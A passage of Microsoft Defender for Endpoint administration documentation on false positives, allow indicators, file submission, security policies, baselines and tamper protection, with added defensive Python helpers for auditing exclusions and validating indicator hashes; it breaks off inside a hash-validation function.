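def audit_extensions(setting: str) -> list[str]:
    """Flag extension exclusions that hide executable content everywhere."""
    findings = []
    for raw in split_list(setting):
        ext = raw.lower().lstrip("*").lstrip(".")
        if ext in RISKY_EXTENSIONS:
            findings.append(f"extension '{raw}' excludes every .{ext} file on every path")
    return findings


def audit_paths(setting: str) -> list[str]:
    """Flag path exclusions that cover a whole drive or a user-writable folder."""
    findings = []
    for raw in split_list(setting):
        path = raw.replace("/", "\\")
        _drive, tail = ntpath.splitdrive(path)
        if tail.strip("\\") in ("", "*"):
            findings.append(f"path '{raw}' excludes an entire drive")
            continue
        folder = path.lower().rstrip("\\") + "\\"
        if any(hint in folder for hint in USER_WRITABLE_HINTS):
            findings.append(f"path '{raw}' is writable by unprivileged users")
    return findings


def audit_processes(setting: str) -> list[str]:
    """Flag process exclusions that do not name an executable.

    As the article notes, a process exclusion covers the files that the named
    process opens, not the process image itself.
    """
    findings = []
    for raw in split_list(setting):
        if not raw.lower().endswith(".exe"):
            findings.append(f"process entry '{raw}' should be the path or name of an .exe")
    return findings


def audit_policy(extensions: str, paths: str, processes: str) -> dict[str, list[str]]:
    """Run all three audits over one Intune exclusion profile."""
    return {
        "ExcludedExtensions": audit_extensions(extensions),
        "ExcludedPaths": audit_paths(paths),
        "ExcludedProcesses": audit_processes(processes),
    }


if __name__ == "__main__":
    # Constructed sample profile: the article's own examples plus three risky entries.
    report = audit_policy(
        extensions="lib|obj|exe",
        paths="C:\\Example|C:\\Example1|D:\\|C:\\Users\\Public\\tools",
        processes="C:\\Example.exe|C:\\Example1.exe|C:\\Tools\\helper",
    )
    for setting, findings in report.items():
        print(setting, "->", findings or "no findings")
```

Run it against the strings you are about to paste into the Intune profile; an empty findings list for each setting is the expected result for a narrowly scoped false-positive fix.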

Indicators for Defender for Endpoint

Indicators (specifically, indicators of compromise, or IoCs) enable your security
operations team to define the detection, prevention, and exclusion of entities. For
example, you can specify certain files to be omitted from scans and remediation actions
in Microsoft Defender for Endpoint. Or, indicators can be used to generate alerts for
certain files, IP addresses, or URLs.

To specify entities as exclusions for Defender for Endpoint, create "allow" indicators for
those entities. Such "allow" indicators apply to next-generation protection and
automated investigation & remediation.

"Allow" indicators can be created for:

Files
IP addresses, URLs, and domains
Application certificates

Indicators for files

When you create an "allow" indicator for a file, such as an executable, it helps prevent
files that your organization is using from being blocked. Files can include portable
executable (PE) files, such as .exe and .dll files.

Before you create indicators for files, make sure the following requirements are met:

Microsoft Defender Antivirus is configured with cloud-based protection enabled
(see Manage cloud-based protection)
Antimalware client version is 4.18.1901.x or later
Devices are running Windows 10, version 1703 or later, or Windows 11; Windows
Server 2012 R2 and Windows Server 2016 with the modern unified solution in
Defender for Endpoint, or Windows Server 2019, or Windows Server 2022
The Block or allow feature is turned on

Indicators for IP addresses, URLs, or domains

When you create an "allow" indicator for an IP address, URL, or domain, it helps prevent
the sites or IP addresses your organization uses from being blocked.

Before you create indicators for IP addresses, URLs, or domains, make sure the following
requirements are met:

Network protection in Defender for Endpoint is enabled in block mode (see Enable
network protection)
Antimalware client version is 4.18.1906.x or later
Devices are running Windows 10, version 1709 or later, or Windows 11
Custom network indicators are turned on in Microsoft Defender XDR. To learn more,
see Advanced features.

Indicators for application certificates

When you create an "allow" indicator for an application certificate, it helps prevent
applications, such as internally developed applications, that your organization uses from
being blocked. Certificate files with the .CER or .PEM extension are supported.

Before you create indicators for application certificates, make sure the following
requirements are met:

Microsoft Defender Antivirus is configured with cloud-based protection enabled
(see Manage cloud-based protection)
Antimalware client version is 4.18.1901.x or later
Devices are running Windows 10, version 1703 or later, or Windows 11; Windows
Server 2012 R2 and Windows Server 2016 with the modern unified solution in
Defender for Endpoint, or Windows Server 2019, or Windows Server 2022
Virus and threat protection definitions are up to date

Tip

When you create indicators, you can define them one by one, or import multiple
items at once. Keep in mind there's a limit of 15,000 indicators for a single tenant.
And, you might need to gather certain details first, such as file hash information.
Make sure to review the prerequisites before you create indicators.
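
The tip above mentions two things you will typically need before creating indicators: the right value for each entity (a file hash, an IP address, a URL or domain, or a certificate thumbprint) and an eye on the 15,000-per-tenant limit. The following is an added example, not Microsoft's code, that covers both: it classifies each candidate value by the indicator type it can become, computes a SHA-256 for a file and a SHA-1 thumbprint from a .CER or .PEM certificate, and refuses a batch that would push the tenant over the limit. The indicatorType names are the ones used by the Defender for Endpoint indicator API; confirm them against the current API reference before importing. The host names and the PEM-wrapped sample bytes are constructed for the demonstration.

```python
"""Validate and prepare values for "allow" indicators in Defender for Endpoint.

Added example, not Microsoft's code. It classifies each candidate value by the
kind of indicator it can become, gathers the details the article says you may
need first (a SHA-256 for a file, a thumbprint for a .CER/.PEM certificate),
and enforces the 15,000-indicator tenant limit. The indicatorType names are
the ones used by the Defender for Endpoint indicator API; confirm them against
the current API reference before importing.
"""
import base64
import hashlib
import ipaddress
import re
from typing import Optional
from urllib.parse import urlparse

TENANT_INDICATOR_LIMIT = 15_000  # limit stated in the article

_HEX = re.compile(r"^[0-9a-fA-F]+$")
_HASH_TYPES = {32: "FileMd5", 40: "FileSha1", 64: "FileSha256"}
_DOMAIN = re.compile(
    r"^(?=.{1,253}$)([a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,63}$", re.I
)


def classify_indicator(value: str) -> Optional[str]:
    """Return the indicator type a value can be created as, or None."""
    v = value.strip()
    if _HEX.match(v) and len(v) in _HASH_TYPES:
        # A 40-hex value may also be a certificate thumbprint; values that come
        # from a .CER/.PEM file should go through certificate_thumbprint().
        return _HASH_TYPES[len(v)]
    try:
        ipaddress.ip_address(v)
        return "IpAddress"
    except ValueError:
        pass
    if _DOMAIN.match(v):
        return "DomainName"
    parsed = urlparse(v)
    if parsed.scheme in ("http", "https") and parsed.netloc:
        return "Url"
    return None


def sha256_hex(data: bytes) -> str:
    """SHA-256 of in-memory bytes, lower-case hex (the form a file indicator needs)."""
    return hashlib.sha256(data).hexdigest()


def file_sha256(path: str) -> str:
    """SHA-256 of a file on disk, read in chunks so large PE files are fine."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            digest.update(chunk)
    return digest.hexdigest()


def certificate_thumbprint(cert_bytes: bytes) -> str:
    """Thumbprint (SHA-1 of the DER encoding, upper-case hex) of a .CER/.PEM file."""
    if b"-----BEGIN" in cert_bytes:
        # PEM: base64 between the BEGIN/END lines; decode back to DER first.
        body = b"".join(
            line.strip()
            for line in cert_bytes.splitlines()
            if line.strip() and not line.startswith(b"-----")
        )
        der = base64.b64decode(body)
    else:
        der = cert_bytes  # already DER (.CER)
    return hashlib.sha1(der).hexdigest().upper()


def plan_allow_indicators(values: list[str], existing_count: int = 0) -> list[dict]:
    """Turn validated values into "allow" indicator records, respecting the tenant limit."""
    if existing_count + len(values) > TENANT_INDICATOR_LIMIT:
        raise ValueError("tenant would exceed the 15,000 indicator limit")
    records = []
    for value in values:
        kind = classify_indicator(value)
        if kind is None:
            raise ValueError(f"not a valid indicator value: {value!r}")
        records.append({"indicatorType": kind, "indicatorValue": value.strip(), "action": "Allowed"})
    return records


if __name__ == "__main__":
    # Constructed sample certificate: a PEM wrapper around the bytes b"abc",
    # enough to show the thumbprint computation without a real certificate.
    sample_pem = b"-----BEGIN CERTIFICATE-----\nYWJj\n-----END CERTIFICATE-----\n"
    print(certificate_thumbprint(sample_pem))
    for rec in plan_allow_indicators(["192.0.2.10", "updates.contoso.example", sha256_hex(b"abc")]):
        print(rec)
```

Feed file_sha256() the executable you want to allow and certificate_thumbprint() the exported .CER or .PEM, then pass the resulting values with your IP, URL and domain entries to plan_allow_indicators(); the records it returns carry the type, value and "Allowed" action you enter when creating the indicators one by one or importing them.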

Part 4: Submit a file for analysis

You can submit entities, such as files and fileless detections, to Microsoft for analysis.
Microsoft security researchers analyze all submissions, and their results help inform
Defender for Endpoint threat protection capabilities. When you sign in at the submission
site, you can track your submissions.

Submit a file for analysis


If you have a file that was either wrongly detected as malicious or was missed, follow
these steps to submit the file for analysis.

1. Review the guidelines here: Submit files for analysis.

2. Submit files in Defender for Endpoint or visit the Microsoft Security Intelligence
submission site and submit your files.

Submit a fileless detection for analysis


If something was detected as malware based on behavior, and you don't have a file, you
can submit your Mpsupport.cab file for analysis. You can get the .cab file by using the
Microsoft Malware Protection Command-Line Utility (MPCmdRun.exe) tool on Windows
10 or Windows 11.

1. Go to C:\ProgramData\Microsoft\Windows Defender\Platform\<version>, and then
run MpCmdRun.exe as an administrator.

2. Type mpcmdrun.exe -GetFiles, and then press Enter.

A .cab file is generated that contains various diagnostic logs. The location of the
file is specified in the output of the command prompt. By default, the location is
C:\ProgramData\Microsoft\Microsoft Defender\Support\MpSupportFiles.cab.

3. Review the guidelines here: Submit files for analysis.

4. Visit the Microsoft Security Intelligence submission site
(https://www.microsoft.com/wdsi/filesubmission), and submit your .cab files.

What happens after a file is submitted?

Your submission is immediately scanned by our systems to give you the latest
determination even before an analyst starts handling your case. It's possible that a file
might have already been submitted and processed by an analyst. In those cases, a
determination is made quickly.

For submissions that weren't already processed, they're prioritized for analysis as
follows:

Prevalent files with the potential to affect a large number of computers are given a
higher priority.
Authenticated customers, especially enterprise customers with valid Software
Assurance IDs (SAIDs), are given a higher priority.
Submissions flagged as high priority by SAID holders are given immediate
attention.

To check for updates regarding your submission, sign in at the Microsoft Security
Intelligence submission site.

Tip

To learn more, see Submit files for analysis.

Part 5: Review and adjust your threat protection settings

Defender for Endpoint offers a wide variety of options, including the ability to fine-tune
settings for various features and capabilities. If you're getting numerous false positives,
make sure to review your organization's threat protection settings. You might need to
make some adjustments to:

Cloud-delivered protection
Remediation for potentially unwanted applications
Automated investigation and remediation

Cloud-delivered protection
Check your cloud-delivered protection level for Microsoft Defender Antivirus. By default,
cloud-delivered protection is set to Not configured; however, we recommend turning it
on. To learn more about configuring your cloud-delivered protection, see Turn on cloud
protection in Microsoft Defender Antivirus.

You can use Intune or other methods, such as Group Policy, to edit or set your
cloud-delivered protection settings.

See Turn on cloud protection in Microsoft Defender Antivirus.

Remediation for potentially unwanted applications

Potentially unwanted applications (PUA) are a category of software that can cause
devices to run slowly, display unexpected ads, or install other software that might be
unexpected or unwanted. Examples of PUA include advertising software, bundling
software, and evasion software that behaves differently with security products. Although
PUA isn't considered malware, some kinds of software are PUA based on their behavior
and reputation.

To learn more about PUA, see Detect and block potentially unwanted applications.

Depending on the apps your organization is using, you might be getting false positives
as a result of your PUA protection settings. If necessary, consider running PUA
protection in audit mode for a while, or apply PUA protection to a subset of devices in
your organization. PUA protection can be configured for the Microsoft Edge browser
and for Microsoft Defender Antivirus.

We recommend using Intune to edit or set PUA protection settings; however, you can
use other methods, such as Group Policy.

See Configure PUA protection in Microsoft Defender Antivirus.

Automated investigation and remediation


Automated investigation and remediation (AIR) capabilities are designed to examine
alerts and take immediate action to resolve breaches. As alerts are triggered, and an
automated investigation runs, a verdict is generated for each piece of evidence
investigated. Verdicts can be Malicious, Suspicious, or No threats found.

Depending on the level of automation set for your organization and other security
settings, remediation actions are taken on artifacts that are considered to be Malicious
or Suspicious. In some cases, remediation actions occur automatically; in other cases,
remediation actions are taken manually or only upon approval by your security
operations team.

Learn more about automation levels, and then
Configure AIR capabilities in Defender for Endpoint.

Important

We recommend using Full automation for automated investigation and
remediation. Don't turn these capabilities off because of a false positive. Instead,
use "allow" indicators to define exceptions, and keep automated investigation and
remediation set to take appropriate actions automatically. Following this guidance
helps reduce the number of alerts your security operations team must handle.

Still need help?

If you've worked through all the steps in this article and still need help, contact technical
support.

1. In the Microsoft Defender portal, in the upper right corner, select the question
mark (?), and then select Microsoft support.

2. In the Support Assistant window, describe your issue, and then send your
message. From there, you can open a service request.

See also
Manage Defender for Endpoint
Manage exclusions for Microsoft Defender for Endpoint and Microsoft Defender
Antivirus
Overview of Microsoft Defender portal
Microsoft Defender for Endpoint on Mac
Microsoft Defender for Endpoint on Linux
Configure Microsoft Defender for Endpoint on iOS features
Configure Defender for Endpoint on Android features

Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community.

Manage endpoint security policies in
Microsoft Defender for Endpoint
Article • 12/14/2023

Important

Some information in this article relates to prereleased product which may be
substantially modified before it's commercially released. Microsoft makes no
warranties, express or implied, with respect to the information provided here.

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Use security policies to manage security settings on devices. As a security administrator,
you can configure security policy settings in Microsoft Defender XDR.

You'll find endpoint security policies under Endpoints > Configuration management >
Endpoint security policies.

Note

The Endpoint Security Policies page in Microsoft Defender XDR is available only for
users with the security administrator role in Microsoft Defender XDR. Any other
user role, such as Security Reader, cannot access the portal. When a user has the
required permissions to view policies in the Microsoft Defender portal, the data is
presented based on Intune permissions. If the user is in scope for Intune role-based
access control, it applies to the list of policies presented in the Microsoft Defender
portal. We recommend granting security administrators the Intune built-in role
"Endpoint Security Manager" to align the level of permissions between Intune and
Microsoft Defender XDR.

The following list provides a brief description of each endpoint security policy type:

Antivirus - Antivirus policies help security admins focus on managing the discrete
group of antivirus settings for managed devices.

Disk encryption - Endpoint security disk encryption profiles focus on only the
settings that are relevant for a device's built-in encryption method, like FileVault or
BitLocker. This focus makes it easy for security admins to manage disk encryption
settings without having to navigate a host of unrelated settings.

Firewall - Use the endpoint security Firewall policy in Intune to configure a device's
built-in firewall for devices that run macOS and Windows 10/11.

Endpoint detection and response - When you integrate Microsoft Defender for
Endpoint with Intune, use the endpoint security policies for endpoint detection and
response (EDR) to manage the EDR settings and onboard devices to Microsoft
Defender for Endpoint.

Attack surface reduction - When Microsoft Defender Antivirus is in use on your
Windows 10/11 devices, use Intune endpoint security policies for attack surface
reduction to manage those settings for your devices.

Create an endpoint security policy

Note

Currently, only antivirus policies are supported.

1. Sign in to Microsoft Defender XDR using at least a security admin role.

2. Select Endpoints > Configuration management > Endpoint security policies and
then select Create new Policy.

3. Select a platform from the dropdown list.

4. Select a template, then select Create policy.

5. On the Basics page, enter a name and description for the profile, then choose
Next.

6. On the Settings page, expand each group of settings, and configure the settings
you want to manage with this profile.

When you're done configuring settings, select Next.

7. On the Assignments page, select the groups that will receive this profile.

Select Next.

8. On the Review + create page, when you're done, select Save. The new profile is
displayed in the list when you select the policy type for the profile you created.

Note

To edit the scope tags, you'll need to go to the Microsoft Intune admin center.

To edit an endpoint security policy

1. Select the new policy, and then select Edit.

2. Select Settings to expand a list of the configuration settings in the policy. You can't
modify the settings from this view, but you can review how they're configured.

3. To modify the policy, select Edit for each category where you want to make a
change:

Basics
Settings
Assignments

4. After you've made changes, select Save to save your edits. Edits to one category
must be saved before you can introduce edits to additional categories.

Verify endpoint security policies

To verify that you have successfully created a policy, select a policy name from the list of
endpoint security policies.

Note

It can take up to 90 minutes for a policy to reach a device. To expedite the process,
for devices managed by Defender for Endpoint, you can select Policy sync from the
actions menu so that the policy is applied in approximately 10 minutes.

The policy page displays details that summarize the status of the policy. You can view a
policy's status, which devices it has been applied to, and assigned groups.

During an investigation, you can also view the Security policies tab in the device page
to view the list of policies that are being applied to a particular device. For more
information, see Investigating devices.

Increase compliance to the Microsoft
Defender for Endpoint security baseline
Article • 02/07/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

Security baselines ensure that security features are configured according to guidance
from both security experts and expert Windows system administrators. When deployed,
the Defender for Endpoint security baseline sets Defender for Endpoint security controls
to provide optimal protection.

To understand security baselines and how they're assigned on Intune using
configuration profiles, read this FAQ.

Before you can deploy and track compliance to security baselines:

Enroll your devices to Intune management
Ensure you have the necessary permissions

Compare the Microsoft Defender for Endpoint and the Windows Intune security
baselines

The Windows Intune security baseline provides a comprehensive set of recommended
settings needed to securely configure devices running Windows, including browser
settings, PowerShell settings, and settings for some security features like Microsoft
Defender Antivirus. In contrast, the Defender for Endpoint baseline provides settings
that optimize all the security controls in the Defender for Endpoint stack, including
settings for endpoint detection and response (EDR) and settings also found in the
Windows Intune security baseline. For more information about each baseline, see:

Windows security baseline settings for Intune
Microsoft Defender for Endpoint baseline settings for Intune

Ideally, devices onboarded to Defender for Endpoint have both baselines deployed: the
Windows Intune security baseline to initially secure Windows, and then the Defender for
Endpoint security baseline layered on top to optimally configure the Defender for
Endpoint security controls. To benefit from the latest data on risks and threats and to
minimize conflicts as baselines evolve, always apply the latest versions of the baselines
across all products as soon as they're released.

Note

The Defender for Endpoint security baseline has been optimized for physical
devices and is currently not recommended for use on virtual machines (VMs) or VDI
endpoints. Certain baseline settings can impact remote interactive sessions on
virtualized environments.

Monitor compliance to the Defender for Endpoint security baseline

The Security baseline card on device configuration management provides an overview
of compliance across Windows 10 and Windows 11 devices that have been assigned the
Defender for Endpoint security baseline.

Card showing compliance to the Defender for Endpoint security baseline

Each device is given one of the following status types:

Matches baseline: Device settings match all the settings in the baseline.
Does not match baseline: At least one device setting doesn't match the baseline.
Misconfigured: At least one baseline setting isn't properly configured on the
device and is in a conflict, error, or pending state.
Not applicable: At least one baseline setting isn't applicable on the device.

To review specific devices, select Configure security baseline on the card. This takes you
to Intune device management. From there, select Device status for the names and
statuses of the devices.

Note

You might experience discrepancies between the aggregated data displayed on the
device configuration management page and the data displayed on overview screens
in Intune.

Review and assign the Microsoft Defender for Endpoint security baseline

Device configuration management monitors baseline compliance only of Windows 10
and Windows 11 devices that have been specifically assigned the Microsoft Defender for
Endpoint security baseline. You can conveniently review the baseline and assign it to
devices on Intune device management.

1. Select Configure security baseline on the Security baseline card to go to Intune
device management. A similar overview of baseline compliance is displayed.

Tip

Alternatively, you can navigate to the Defender for Endpoint security baseline
in the Microsoft Azure portal from All services > Intune > Device security >
Security baselines > Microsoft Defender ATP baseline.

2. Create a new profile.

Microsoft Defender for Endpoint security baseline overview on Intune

3. During profile creation, you can review and adjust specific settings on the baseline.

Security baseline options during profile creation on Intune

4. Assign the profile to the appropriate device group.

Assigning the security baseline profile on Intune

5. Create the profile to save it and deploy it to the assigned device group.

Creating the security baseline profile on Intune

Tip

Security baselines on Intune provide a convenient way to comprehensively secure
and protect your devices. Learn more about security baselines on Intune.

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Related articles
Ensure your devices are configured properly
Get devices onboarded to Microsoft Defender for Endpoint
Optimize ASR rule deployment and detections

Optimize ASR rule deployment and
detections
Article • 11/15/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

Attack surface reduction rules identify and prevent typical malware exploits. They
control when and how potentially malicious code can run. For example, they can prevent
JavaScript or VBScript from launching a downloaded executable, block Win32 API calls
from Office macros, and block processes that run from USB drives.

Attack surface management card

The Attack surface management card is an entry point to tools in Microsoft Defender
portal that you can use to:

Understand how ASR rules are currently deployed in your organization.
Review ASR detections and identify possible incorrect detections.
Analyze the impact of exclusions and generate the list of file paths to exclude.

Select Go to attack surface management > Reports > Attack surface reduction rules >
Add exclusions. From there, you can navigate to other sections of Microsoft Defender
portal.

The Add exclusions tab in the Attack surface reduction rules page in Microsoft
Defender portal

Note

To access Microsoft Defender portal, you need a Microsoft 365 E3 or E5 license and
an account that has certain roles on Microsoft Entra ID. Read about required
licenses and permissions.

For more information about ASR rule deployment in Microsoft Defender portal, see
Optimize ASR rule deployment and detections.

Related topics
Ensure your devices are configured properly
Get devices onboarded to Microsoft Defender for Endpoint
Monitor compliance to the Microsoft Defender for Endpoint security baseline

Built-in protection helps guard against
ransomware
Article • 06/06/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2

Microsoft Defender for Endpoint helps prevent, detect, investigate, and respond to
advanced threats, such as ransomware attacks. Next-generation protection and attack
surface reduction capabilities in Defender for Endpoint were designed to catch
emerging threats. In order for the best protection from ransomware and other
cyberthreats to be in place, certain settings must be configured. Built-in protection can
help by providing you with default settings for better protection.

Tip

You don't have to wait for built-in protection to come to you! You can protect
your organization's devices now by configuring these capabilities:

Enable cloud protection
Turn tamper protection on
Set standard attack surface reduction rules to block mode
Enable network protection in block mode

What is built-in protection, and how does it work?

Built-in protection is a set of default settings that are rolling out to help ensure your
devices are protected. These default settings are designed to protect devices from
ransomware and other threats. Initially, built-in protection includes turning tamper
protection on for your tenant, with other default settings coming soon. For more
information, see the Tech Community blog post, Tamper protection will be turned on for
all enterprise customers.

Phase: Built-in protection is rolling out
What happens: Customers are receiving notification that built-in protection is coming. If
it's not already configured, tamper protection is turned on for customers who have
Defender for Endpoint Plan 2 or Microsoft 365 E5.

Phase: Built-in protection becomes available for your tenant
What happens: You'll be notified that your tenant is about to receive built-in protection
and when tamper protection will be turned on (if it's not already configured).

Phase: Built-in protection arrives
What happens: Tamper protection is turned on for your tenant, and is applied to your
organization's Windows devices. You can opt out or change your built-in protection
settings.

Phase: After built-in protection has arrived
What happens: Whenever new devices are onboarded to Defender for Endpoint, built-in
protection settings are applied to any new devices running Windows. You can always
change your built-in protection settings.

Note

Built-in protection sets default values for Windows and Mac devices. If endpoint
security settings change, such as through baselines or policies in Microsoft Intune,
those settings override the built-in protection settings.

What does the notification look like?

You can expect to receive two types of notifications:

A message center post indicating that built-in protection is coming soon; and

A banner in the Microsoft Defender portal that resembles the following image:

Your notification tells you when built-in protection is coming and when tamper
protection will be turned on (if it's not already configured) for your tenant.

Can I opt out?

You can opt out of built-in protection by specifying your own security settings. For
example, if you prefer to not have tamper protection turned on automatically for your
tenant, you can explicitly opt out.

Caution

We do not recommend turning tamper protection off. Tamper protection provides
you with better ransomware protection. You must be a global administrator or
security administrator to perform the following procedure.

1. Go to the Microsoft Defender portal (https://security.microsoft.com) and sign in.

2. Go to Settings > Endpoints > Advanced features.

3. Set Tamper protection to On (if it's not already on), and then select Save
preferences. Don't leave this page yet.

4. Set Tamper protection to Off, and then select Save preferences.

Can I change built-in protection settings?

Built-in protection is a set of default settings. You aren't required to keep these default
settings in place. You can always change your settings to suit your business needs. The
following table lists tasks your security team might perform, along with links to learn
more.

Task: Determine whether tamper protection is turned on for your organization
Description:
1. Go to the Microsoft Defender portal (https://security.microsoft.com) and sign in.
2. Go to Settings > Endpoints > Advanced features > Tamper protection.

Task: Manage tamper protection tenant wide using the Microsoft Defender portal
(https://security.microsoft.com)
Description:
1. Go to the Microsoft Defender portal (https://security.microsoft.com) and sign in.
2. Go to Settings > Endpoints > Advanced features.
3. Set Tamper protection to On (recommended) or Off.
4. Select Save preferences.
See Manage tamper protection for your organization using Microsoft Defender portal.

Task: Set tamper protection settings for some, but not all, devices
Description: Use endpoint security policies and profiles that are applied to specific
devices. See the following articles:
- Manage tamper protection using Microsoft Intune
- Manage tamper protection using tenant attach with Configuration Manager, version 2006

Task: Turn tamper protection on or off on an individual Windows device
Description:
1. On your Windows device, select Start, and start typing Security.
2. In the search results, select Windows Security.
3. Select Virus & threat protection > Virus & threat protection settings.
4. Set Tamper Protection to On (recommended) or Off.
If the device is onboarded to Defender for Endpoint, or the device is managed in the
Microsoft Intune admin center, those settings will override user settings on the
individual device. See Manage tamper protection on an individual device.

Task: Turn tamper protection on or off manually on a Mac
Description:
1. On your Mac, open Finder, and go to Applications > Utilities > Terminal.
2. In Terminal, type the following command: sudo mdatp config tamper-protection
enforcement-level --value (chosen mode).
See Manual configuration.

Task: Change tamper protection settings using a Mobile Device Management (MDM)
solution
Description: To change the tamper protection mode using an MDM, go to the
configuration profile and change the enforcement level in Intune or JAMF. The
configuration profile set with the MDM will be your first point of reference. Any settings
defined in the profile will be enforced on the device, and built-in protection default
settings won't override these applied settings.

Task: Temporarily disable tamper protection on a device for troubleshooting purposes
Description: See the following articles:
- Get started with troubleshooting mode in Microsoft Defender for Endpoint
- Troubleshooting mode scenarios in Microsoft Defender for Endpoint

See also
Tech Community blog: Tamper protection will be turned on for all enterprise
customers
Protect security settings with tamper protection
Manage endpoint security in Microsoft Intune
Configure Microsoft Defender for Endpoint in Intune
Manage Microsoft Defender for Endpoint on devices with Microsoft Intune
Responding to ransomware attacks

Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community .


Overview of endpoint detection and
response
Article • 10/09/2023

Applies to:

Microsoft Defender for Endpoint Plans 1 and 2
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Endpoint detection and response capabilities in Defender for Endpoint provide
advanced attack detections that are near real-time and actionable. Security analysts can
prioritize alerts effectively, gain visibility into the full scope of a breach, and take
response actions to remediate threats.

When a threat is detected, alerts are created in the system for an analyst to investigate.
Alerts with the same attack techniques or attributed to the same attacker are
aggregated into an entity called an incident. Aggregating alerts in this manner makes it
easy for analysts to collectively investigate and respond to threats.

Note

Defender for Endpoint detection is not intended to be an auditing or logging
solution that records every operation or activity that happens on a given endpoint.
Our sensor has an internal throttling mechanism, so that a high rate of repeated
identical events doesn't flood the logs.

Important

Defender for Endpoint Plan 1 and Microsoft Defender for Business include only
the following manual response actions:

Run antivirus scan
Isolate device
Stop and quarantine a file
Add an indicator to block or allow a file

Inspired by the "assume breach" mindset, Defender for Endpoint continuously collects
behavioral cyber telemetry. This includes process information, network activities, deep
optics into the kernel and memory manager, user login activities, registry and file system
changes, and others. The information is stored for six months, enabling an analyst to
travel back in time to the start of an attack. The analyst can then pivot in various views
and approach an investigation through multiple vectors.

The response capabilities give you the power to promptly remediate threats by acting
on the affected entities.

See also
Incidents queue
Alerts queue
Devices list



Submit files in Microsoft Defender for
Endpoint
Article • 02/15/2024

Applies to:

Microsoft Defender for Endpoint
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

In Microsoft Defender for Endpoint, admins can use the unified submissions feature to
submit files and file hashes (SHAs) to Microsoft for review. The unified submissions
experience is a one-stop shop for submitting emails, URLs, email attachments, and files
in one, easy-to-use submission experience. Admins can use the Microsoft Defender
portal or the Microsoft Defender for Endpoint Alert page to submit suspicious files.

What do you need to know before you begin?

The new unified submissions experience is available only in subscriptions that include
Microsoft Defender for Endpoint Plan 2. You need to assign permissions before you can
perform the procedures in this article. Use one of the following options:

Microsoft Defender for Endpoint permissions:

Submit files / file hashes: "Alerts investigation" or "Manage security settings in
Security Center"
View submissions: "View Data - Security operations"

Microsoft Defender XDR unified RBAC permissions:

Submit files / file hashes: "Alerts (Manage)" or "Core security settings (manage)"
View submissions: "Security data basics (read)"

For more information about how you can submit spam, phish, URLs, and email
attachments to Microsoft, see Use the Submissions page to submit suspected spam,
phish, URLs, legitimate email getting blocked, and email attachments to Microsoft.

Submit a file or file hash to Microsoft from the Defender portal

1. In the Microsoft Defender portal at https://security.microsoft.com, go to Actions
& submissions > Submissions. Or, to go directly to the Submissions page, use
https://security.microsoft.com/reportsubmission.

2. On the Submissions page, select the Files tab.

3. On the Files tab, select Add new submission.

4. In the Submit items to Microsoft for review flyout that opens, select Files or File
hash from the Select the submission type dropdown list.

If you selected Files, configure the following options:

- Select Browse files. In the dialog that opens, find and select the file, and then
  select Open. Repeat this step as many times as necessary. To remove an entry from
  the flyout, select next to the entry.
  The maximum total size of all files is 500 MB.
  Use the password 'infected' to encrypt archive files.
- The file should have been categorized as: Select one of the following values:
  Malware (false negative)
  Unwanted software
  Clean (false positive)
- Choose the priority: Select one of the following values:
  Low - bulk file or file hash submission
  Medium - standard submission
  High - needs immediate attention (max three per day)
- Notes for Microsoft (optional): Enter an optional note.
- Share feedback and relevant content with Microsoft: Read the privacy statement and
  then select this option.

If you selected File hash, configure the following options:

- In the empty box, enter the file hash value (for example,
  2725eb73741e23a254404cc6b5a54d9511b9923be2045056075542ca1bfbf3fe) and then press
  the ENTER key. Repeat this step as many times as necessary. To remove an entry
  from the flyout, select next to the entry.
- The file should have been categorized as: Select one of the following values:
  Malware (false negative)
  Unwanted software
  Clean (false positive)
- Notes for Microsoft (optional): Enter an optional note.
- Share feedback and relevant content with Microsoft: Read the privacy statement and
  then select this option.

When you're finished in the Submit items to Microsoft for review flyout, select
Submit.

Back on the Files tab of the Submissions page, the submission is shown.

To view the details of the submission, select the submission by clicking anywhere in the
row other than the check box next to the Submission name. The details of the
submission are in the details flyout that opens.
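Before pasting a hash into the Submissions flyout it is worth confirming which digest you are holding and, where you have the sample, computing it yourself. The following Python is an added example and is not part of this article or of Defender for Endpoint. It assumes, from the article's "file hashes (SHAs)" wording and its 64-character example value, that SHA-1 and SHA-256 are the digest types being submitted; the `sha256:`-style prefix handling and the `build_hash_submission` record shape are this example's own conventions, and the category names are the three the flyout offers.

```python
"""Added example: validate a file hash before submitting it, and compute the
digests of a sample yourself. Not Defender for Endpoint code; the accepted
digest types (assumption: SHA-1 and SHA-256) and the submission record shape
are this example's own conventions."""
import hashlib
import re

# Assumption: a submitted "SHA" is either SHA-1 (40 hex chars) or SHA-256 (64 hex chars).
DIGEST_BY_LENGTH = {40: "sha1", 64: "sha256"}

# The three categories the Submissions flyout offers (from the article).
CATEGORIES = ("Malware (false negative)", "Unwanted software", "Clean (false positive)")


def normalize_hash(value: str) -> tuple:
    """Return (digest_type, lowercase_hex) for a pasted hash, or raise ValueError.

    Tolerates surrounding whitespace and a 'sha256:' / 'sha1:' style prefix
    (a convention of this example, not of the portal)."""
    text = value.strip().lower()
    prefix = None
    if ":" in text:
        prefix, _, text = text.partition(":")
    if not re.fullmatch(r"[0-9a-f]+", text):
        raise ValueError("hash must be hexadecimal")
    digest_type = DIGEST_BY_LENGTH.get(len(text))
    if digest_type is None:
        raise ValueError(f"unexpected digest length {len(text)}; expected 40 (SHA-1) or 64 (SHA-256)")
    if prefix is not None and prefix != digest_type:
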